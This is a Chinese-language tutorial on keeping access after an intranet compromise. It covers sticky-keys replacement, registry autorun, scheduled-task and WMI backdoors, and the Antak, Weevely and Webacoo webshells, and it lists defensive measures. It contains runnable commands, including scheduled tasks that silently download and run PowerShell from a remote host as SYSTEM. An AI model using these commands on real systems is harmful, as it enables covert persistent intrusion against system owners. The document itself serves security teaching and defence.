内网渗透基石篇——权限维持分析(上)
字数 1364 2025-08-13 21:33:20
内网渗透权限维持技术详解(上)
一、操作系统后门技术
1. 粘滞键后门
原理:利用Windows粘滞键功能(sethc.exe)替换为cmd.exe,通过连续按5次Shift键获取命令行权限。
实施步骤:
- 获取sethc.exe文件所有权:
右键属性 → 安全 → 高级 → 所有者 → 改为Administrator - 设置完全控制权限:勾选"完全控制"权限
- 替换文件:复制cmd.exe并重命名为sethc.exe替换原文件
Empire工具实现:
usemodule lateral_movement/invoke_wmi_debuggerinfo
set Listener testx
set ComputerName WIN7-64.admin.testx
set TargetBinary sethc.exe
execute
防范措施:
- 远程登录时连续按5次Shift键测试
- 定期检查system32目录下sethc.exe文件属性
- 使用文件完整性监控工具
2. 注册表注入后门
原理:将后门程序路径写入注册表自启动项,实现持久化。
实施方法:
usemodule persistence/userland/registry
set Name testx
set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
execute
防范措施:
- 启用杀毒软件实时监控
- 定期检查注册表自启动项
- 使用Autoruns等工具分析启动项
3. 计划任务后门
Windows命令实现:
# 创建计划任务
schtasks /Create /tn Updater /tr notepad.exe /sc hourly /mo 1
# 用户登录触发
schtasks /create /tn WindowsUpdate /tr "powershell -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(\"http://10.1.1.16:8080/EYoBVHcTfv\"))'" /sc onlogon /ru System
# 系统启动触发
schtasks /create /tn WindowsUpdate /tr "powershell -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(\"http://10.1.1.16:8080/EYoBVHcTfv\"))'" /sc onstart /ru System
# 系统空闲触发
schtasks /create /tn WindowsUpdate /tr "powershell -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(\"http://10.1.1.16:8080/EYoBVHcTfv\"))'" /sc onidle /i 1
PowerSploit实现:
Import-Module .\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
Add-Persistence -FilePath ./shuteer.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
Empire实现:
usemodule persistence/elevated/schtasks
set DailyTime 10.30
set Listener test
execute
防范措施:
- 定期检查计划任务列表
- 监控异常的计划任务创建行为
- 限制普通用户创建计划任务的权限
4. WMI型后门
原理:利用WMI的无文件和无进程特性,将代码加密存储于WMI中,条件触发时执行。
Empire实现:
usemodule persistence/elevated/wmi
execute
验证方法:
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Updater'"
防范措施:
- 监控WMI事件订阅
- 检查root\Subscription命名空间下的异常项目
- 使用WMI过滤器检测恶意订阅
二、Web后门技术
1. Nishang Webshell
特点:
- 基于PowerShell的渗透测试工具
- 包含ASPX大马功能
- 支持文件上传下载、命令执行等
使用方法:
- 将Antak-WebShell目录下的antak.aspx部署到IIS
- 访问antak.aspx页面
- 使用默认凭据登录:
- 用户名:Disclaimer
- 密码:ForLegitUseOnly
功能命令:
help:查看帮助ls:查看目录download:下载文件upload:上传文件
2. Weevely后门
特点:
- 针对PHP平台的WebShell
- Python编写
- 支持多种功能模块
基本用法:
# 生成后门
weevely generate <password> <output_file>
# 连接后门
weevely <URL> <password>
常用命令:
audit_phpconf:审计PHP配置audit_suidsgid:查找SUID/SGID文件shell_sh:执行shell命令backdoor_tcp:创建TCP后门net_scan:端口扫描
3. Webacoo后门
特点:
- 针对PHP平台的Cookie型后门
- 隐蔽性较强
使用方法:
# 生成后门
webacoo -g -o backdoor.php
# 连接后门
webacoo -t -u http://target/backdoor.php
功能:
- 文件上传下载
- 数据库操作
- 端口扫描
- 代理功能
防御建议
-
操作系统后门防御:
- 启用完整日志记录
- 实施文件完整性监控
- 定期检查系统关键文件和注册表
- 限制不必要的WMI功能
-
Web后门防御:
- 禁用危险PHP函数
- 实施严格的文件上传限制
- 定期扫描Web目录
- 使用WAF防护
- 监控异常网络流量
-
通用防御:
- 最小权限原则
- 多因素认证
- 定期漏洞扫描
- 安全配置基线
本教学文档详细介绍了内网渗透中常见的权限维持技术及其防御措施,重点涵盖了操作系统后门和Web后门两大类别。在实际安全工作中,防御者需要了解这些攻击技术才能有效防护,同时要遵循合法合规原则。